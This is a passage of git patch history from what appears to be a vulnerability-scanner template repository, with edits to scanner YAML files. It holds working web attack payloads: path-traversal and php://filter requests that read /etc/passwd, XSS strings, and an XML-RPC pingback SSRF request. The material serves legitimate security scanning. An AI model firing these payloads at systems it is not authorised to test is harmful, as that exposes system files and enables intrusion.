"{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" + - "{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd" + - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + stop-at-first-match: true + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body From ab159a714331d8964fe78e005064898fae883634 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 20 Sep 2021 23:59:34 +0530 Subject: [PATCH 2434/4083] Update linux-lfi-fuzzing.yaml --- fuzzing/linux-lfi-fuzzing.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fuzzing/linux-lfi-fuzzing.yaml b/fuzzing/linux-lfi-fuzzing.yaml index 178646c54c..9441661aa1 100644 --- a/fuzzing/linux-lfi-fuzzing.yaml +++ b/fuzzing/linux-lfi-fuzzing.yaml @@ -23,11 +23,11 @@ requests: - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" From dbb071ea6db2bc1a4b2158cf8efc16e12eb79d0c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 21 Sep 2021 00:10:11 +0530 Subject: [PATCH 2435/4083] Update gilacms-detect.yaml --- technologies/gilacms-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/gilacms-detect.yaml b/technologies/gilacms-detect.yaml index e2b3e5f0b5..335b1b291e 100644 --- a/technologies/gilacms-detect.yaml +++ b/technologies/gilacms-detect.yaml @@ -20,6 +20,7 @@ requests: words: - 'Homepage | Gila CMS' - '' + condition: or - type: status status: From 638ea5d05565d136e675cd2993323a995cee8cdf Mon Sep 17 00:00:00 2001 From: sullo Date: Mon, 20 Sep 2021 14:56:09 -0400 Subject: [PATCH 2436/4083] Add cgi as a valid Perl filetype --- file/perl/perl-scanner.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/file/perl/perl-scanner.yaml b/file/perl/perl-scanner.yaml index 6618d7e4ea..f8e2be786c 100644 --- a/file/perl/perl-scanner.yaml +++ b/file/perl/perl-scanner.yaml @@ -12,6 +12,7 @@ file: - perl # uncommon - pod # plain old documentation - pm # perl module + - cgi # common gateway interface extractors: - type: regex From 1c88f937d055bb3fdaf5836edda690c4d498377c Mon Sep 17 00:00:00 2001 From: sullo Date: Mon, 20 Sep 2021 15:20:22 -0400 Subject: [PATCH 2437/4083] Typo when building YAML from source information --- takeovers/readme-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/readme-takeover.yaml b/takeovers/readme-takeover.yaml index 0065f73839..b538c679ba 100644 --- a/takeovers/readme-takeover.yaml +++ b/takeovers/readme-takeover.yaml @@ -15,4 +15,4 @@ requests: matchers: - type: word words: - - Project doesnt exist... yet! \ No newline at end of file + - Project doesn't exist... yet! From ec05f1bf3b2d28f166238369fa28823588250d8f Mon Sep 17 00:00:00 2001 From: sullo Date: Mon, 20 Sep 2021 15:20:59 -0400 Subject: [PATCH 2438/4083] Validated this type is not in upstream data sources --- exposed-panels/glpi-authentication.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/glpi-authentication.yaml b/exposed-panels/glpi-authentication.yaml index 492a0df24e..b5aa1a7a32 100644 --- a/exposed-panels/glpi-authentication.yaml +++ b/exposed-panels/glpi-authentication.yaml @@ -1,10 +1,10 @@ id: glpi-authentication info: - name: GLPI - Authentification + name: GLPI - Authentication author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22 + reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentication%22 tags: panel,auth requests: From b57620cce27b5ac4cdb422905ec6f87a03957afa Mon Sep 17 00:00:00 2001 From: sullo Date: Mon, 20 Sep 2021 15:25:11 -0400 Subject: [PATCH 2439/4083] Typo and language corrections --- cves/2017/CVE-2017-10075.yaml | 2 +- cves/2021/CVE-2021-32820.yaml | 4 ++-- misconfiguration/rack-mini-profiler.yaml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml index d7eb8e1003..3083d00632 100644 --- a/cves/2017/CVE-2017-10075.yaml +++ b/cves/2017/CVE-2017-10075.yaml @@ -4,7 +4,7 @@ info: name: Oracle Content Server XSS author: madrobot severity: high - description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site. + description: The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html tags: cve,cve2017,xss,oracle classification: diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 99daa3b409..4d9d53ec47 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -7,13 +7,13 @@ info: reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json - tags: cve,cve2021,expressjs,lfi + tags: cve,cve2021,expressjs,lfi,xxe classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.60 cve-id: CVE-2021-32820 cwe-id: CWE-200 - description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability." + description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability." requests: - method: GET diff --git a/misconfiguration/rack-mini-profiler.yaml b/misconfiguration/rack-mini-profiler.yaml index 998f3b44c5..c6743ef9a6 100644 --- a/misconfiguration/rack-mini-profiler.yaml +++ b/misconfiguration/rack-mini-profiler.yaml @@ -1,7 +1,7 @@ id: rack-mini-profiler info: - name: rack-mini-profiler environmnet information disclosure + name: rack-mini-profiler environment information disclosure author: vzamanillo severity: high tags: config,debug From d3d5550d9855648603a9836089b3d44727db8421 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 21 Sep 2021 00:39:04 -0300 Subject: [PATCH 2440/4083] Update azure-takeover-detection.yaml Trafficmanager no longer possible to takeover. Moved to another template to have severity info --- dns/azure-takeover-detection.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index c3191cdd0a..68d9a0a9eb 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -39,7 +39,6 @@ dns: - "redis.cache.windows.net" - "search.windows.net" - "servicebus.windows.net" - - "trafficmanager.net" - "visualstudio.com" - type: word words: From 26155cdd44e0b7b91492daa7296a901efa1ddca4 Mon Sep 17 00:00:00 2001 From: nerrorsec <42860825+nerrorsec@users.noreply.github.com> Date: Tue, 21 Sep 2021 10:31:19 +0545 Subject: [PATCH 2441/4083] Added a path --- exposures/configs/git-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml index 919106075f..520aec24f1 100644 --- a/exposures/configs/git-config.yaml +++ b/exposures/configs/git-config.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/.git/config" + - "{{BaseURL}}/wp-content/themes/.git/config" matchers-condition: and matchers: From 27d8d4e4ecf4c1f13bee1ea7475116fb9650da64 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 13:33:21 +0530 Subject: [PATCH 2442/4083] misc update --- cves/2021/CVE-2021-38314.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-38314.yaml b/cves/2021/CVE-2021-38314.yaml index 7e422dcf59..764cc200ef 100644 --- a/cves/2021/CVE-2021-38314.yaml +++ b/cves/2021/CVE-2021-38314.yaml @@ -7,7 +7,7 @@ info: reference: - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 - tags: cve,cve2021,wordpress + tags: cve,cve2021,wordpress,wp-plugin requests: - raw: @@ -33,7 +33,6 @@ requests: regex: - '[a-f0-9]{32}' part: body - condition: and - type: status status: From 5219dd00b83e74d0dd2ddb2b06c1b1dc6ed54b2b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 Sep 2021 08:07:26 +0000 Subject: [PATCH 2443/4083] Auto Generated CVE annotations [Tue Sep 21 08:07:26 UTC 2021] :robot: --- cves/2021/CVE-2021-38314.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-38314.yaml b/cves/2021/CVE-2021-38314.yaml index 764cc200ef..bb3ddad58e 100644 --- a/cves/2021/CVE-2021-38314.yaml +++ b/cves/2021/CVE-2021-38314.yaml @@ -8,6 +8,11 @@ info: - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 tags: cve,cve2021,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-38314 + description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." requests: - raw: From 6d48738a233f47980163786e59b4dd4531360575 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 21 Sep 2021 15:41:11 +0700 Subject: [PATCH 2444/4083] Create CVE-2015-7377.yaml --- cves/2015/CVE-2015-7377.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2015/CVE-2015-7377.yaml diff --git a/cves/2015/CVE-2015-7377.yaml b/cves/2015/CVE-2015-7377.yaml new file mode 100644 index 0000000000..e24194fa5b --- /dev/null +++ b/cves/2015/CVE-2015-7377.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-7377 + +info: + name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 + tags: cve,cve2015,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 2bdff44ad1acf350d381b9656770d613085777ae Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 21 Sep 2021 14:12:19 +0530 Subject: [PATCH 2445/4083] Update readme-takeover.yaml --- takeovers/readme-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/readme-takeover.yaml b/takeovers/readme-takeover.yaml index b538c679ba..942af6ab47 100644 --- a/takeovers/readme-takeover.yaml +++ b/takeovers/readme-takeover.yaml @@ -15,4 +15,4 @@ requests: matchers: - type: word words: - - Project doesn't exist... yet! + - 'Project doesnt exist... yet!' From 321d816b15aebcae08f8445d60f2ec82dc6b557c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 14:18:34 +0530 Subject: [PATCH 2446/4083] Added sitecore-version detection --- technologies/sitecore-version.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 technologies/sitecore-version.yaml diff --git a/technologies/sitecore-version.yaml b/technologies/sitecore-version.yaml new file mode 100644 index 0000000000..9371cfc349 --- /dev/null +++ b/technologies/sitecore-version.yaml @@ -0,0 +1,30 @@ +id: sitecore-version + +info: + name: Sitecore version detection + author: bernardofsr + severity: info + tags: sitecore,tech + reference: https://www.cvedetails.com/vulnerability-list/vendor_id-9609/Sitecore.html + +requests: + - method: GET + path: + - "{{BaseURL}}/sitecore/shell/sitecore.version.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Sitecore Corporation" + part: body + + extractors: + - type: regex + group: 1 + regex: + - "([0-9]+)" From 7b23f4ebd47e2f7e3bf0d766b458eeb4860d9488 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 14:34:20 +0530 Subject: [PATCH 2447/4083] outdated template cleanups --- cves/2018/CVE-2018-1247.yaml | 39 ------------------------------------ cves/2020/CVE-2020-8091.yaml | 34 ------------------------------- 2 files changed, 73 deletions(-) delete mode 100644 cves/2018/CVE-2018-1247.yaml delete mode 100644 cves/2020/CVE-2020-8091.yaml diff --git a/cves/2018/CVE-2018-1247.yaml b/cves/2018/CVE-2018-1247.yaml deleted file mode 100644 index c040304736..0000000000 --- a/cves/2018/CVE-2018-1247.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-1247 - -info: - name: RSA Authentication Manager XSS - author: madrobot - severity: high - tags: cve,cve2018,xss,flash - classification: - cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H - cvss-score: 7.10 - cve-id: CVE-2018-1247 - cwe-id: CWE-611 - description: "RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application." - reference: - - http://seclists.org/fulldisclosure/2018/May/18 - - http://www.securitytracker.com/id/1040835 - - http://www.securityfocus.com/bid/104107 - - https://www.exploit-db.com/exploits/44634/ - -requests: - - method: GET - path: - - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//" - - matchers-condition: and - matchers: - - type: word - words: - - "application/x-shockwave-flash" - part: header - - - type: word - words: - - "javascript:alert(1337)" - part: body - - - type: status - status: - - 200 \ No newline at end of file diff --git a/cves/2020/CVE-2020-8091.yaml b/cves/2020/CVE-2020-8091.yaml deleted file mode 100644 index 96ccd5bd0a..0000000000 --- a/cves/2020/CVE-2020-8091.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-8091 - -info: - name: TYPO3 Cross-Site Scripting Vulnerability - author: dwisiswant0 - severity: medium - description: svg.swf in TYPO3 6.2.0 to 6.2.38 ELTS and 7.0.0 to 7.1.0 could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack on a targeted system. This may be at a contrib/websvg/svg.swf pathname. - tags: cve,cve2020,xss - reference: - - https://typo3.org/security/advisory/typo3-psa-2019-003/ - - https://www.purplemet.com/blog/typo3-xss-vulnerability - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-8091 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "31337" - part: body - - type: word - words: - - "application/x-shockwave-flash" - part: header \ No newline at end of file From 0306dd8a5381cd0d05c9116192381760fede59cd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 21 Sep 2021 15:12:50 +0530 Subject: [PATCH 2448/4083] Update CVE-2015-7377.yaml --- cves/2015/CVE-2015-7377.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2015/CVE-2015-7377.yaml b/cves/2015/CVE-2015-7377.yaml index e24194fa5b..5759e5bf8f 100644 --- a/cves/2015/CVE-2015-7377.yaml +++ b/cves/2015/CVE-2015-7377.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5bb6d9889d58cf217af314b49132194d1e163011 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 Sep 2021 09:48:03 +0000 Subject: [PATCH 2449/4083] Auto Generated CVE annotations [Tue Sep 21 09:48:03 UTC 2021] :robot: --- cves/2015/CVE-2015-7377.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2015/CVE-2015-7377.yaml b/cves/2015/CVE-2015-7377.yaml index 5759e5bf8f..0e95547716 100644 --- a/cves/2015/CVE-2015-7377.yaml +++ b/cves/2015/CVE-2015-7377.yaml @@ -8,6 +8,7 @@ info: - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI." requests: - method: GET From 10a6436f6f6ec2f2fe16834aa49b6c7ed26a3cdf Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 15:18:49 +0530 Subject: [PATCH 2450/4083] Added Wordpress XMLRPC Pingback detection --- .../wp-xmlrpc-pingback-detection.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml diff --git a/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml b/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml new file mode 100644 index 0000000000..da1277e0fb --- /dev/null +++ b/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml @@ -0,0 +1,38 @@ +id: wp-xmlrpc-pingback-detection + +info: + name: Wordpress XMLRPC Pingback detection + author: pdteam + severity: info + tags: wordpress,ssrf,oob + reference: + - https://github.com/dorkerdevil/rpckiller + - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 + +requests: + - raw: + - | + POST /xmlrpc.php HTTP/1.1 + Host: {{Hostname}} + + + pingback.ping + + + + http://{{interactsh-url}} + + + + + {{BaseURL}}/?p=1 + + + + + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" From ff4811e085adab65e30108fe33fb1ed18f1d63e1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 21 Sep 2021 15:21:16 +0530 Subject: [PATCH 2451/4083] Create wordpress-git-config.yaml --- .../wordpress/wordpress-git-config.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-git-config.yaml diff --git a/vulnerabilities/wordpress/wordpress-git-config.yaml b/vulnerabilities/wordpress/wordpress-git-config.yaml new file mode 100644 index 0000000000..623ab5f4aa --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-git-config.yaml @@ -0,0 +1,31 @@ +id: wordpress-git-config + +info: + name: Wordpress Git Config + author: nerrorsec + severity: info + description: Searches for the pattern /.git/config inside themes and plugins folder. + reference: https://hackerone.com/reports/248693 + tags: config,git,exposure,wordpress,wp-plugin,wp-theme + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/.git/config" + - "{{BaseURL}}/wp-content/themes/.git/config" + + matchers-condition: and + matchers: + - type: word + words: + - "[core]" + + - type: dsl + dsl: + - "!contains(tolower(body), ' Date: Tue, 21 Sep 2021 15:21:35 +0530 Subject: [PATCH 2452/4083] fixing xmlrpc-pingback-ssrf.yaml --- vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml index b09815f5c8..8e99a56920 100644 --- a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml +++ b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml @@ -26,6 +26,6 @@ requests: matchers: - type: word - part: interactsh-protocol + part: interactsh_protocol words: - "http" From 29eedeb9a0d4a974ad58848a33a34ce7943ebbd5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 21 Sep 2021 15:21:47 +0530 Subject: [PATCH 2453/4083] Update git-config.yaml --- exposures/configs/git-config.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml index 520aec24f1..7fb589efc6 100644 --- a/exposures/configs/git-config.yaml +++ b/exposures/configs/git-config.yaml @@ -11,8 +11,6 @@ requests: - method: GET path: - "{{BaseURL}}/.git/config" - - "{{BaseURL}}/wp-content/themes/.git/config" - matchers-condition: and matchers: - type: word From 55efe5b6c19f3e69a5d40881473d92657b98c045 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 21 Sep 2021 15:22:04 +0530 Subject: [PATCH 2454/4083] Update git-config.yaml --- exposures/configs/git-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml index 7fb589efc6..919106075f 100644 --- a/exposures/configs/git-config.yaml +++ b/exposures/configs/git-config.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/.git/config" + matchers-condition: and matchers: 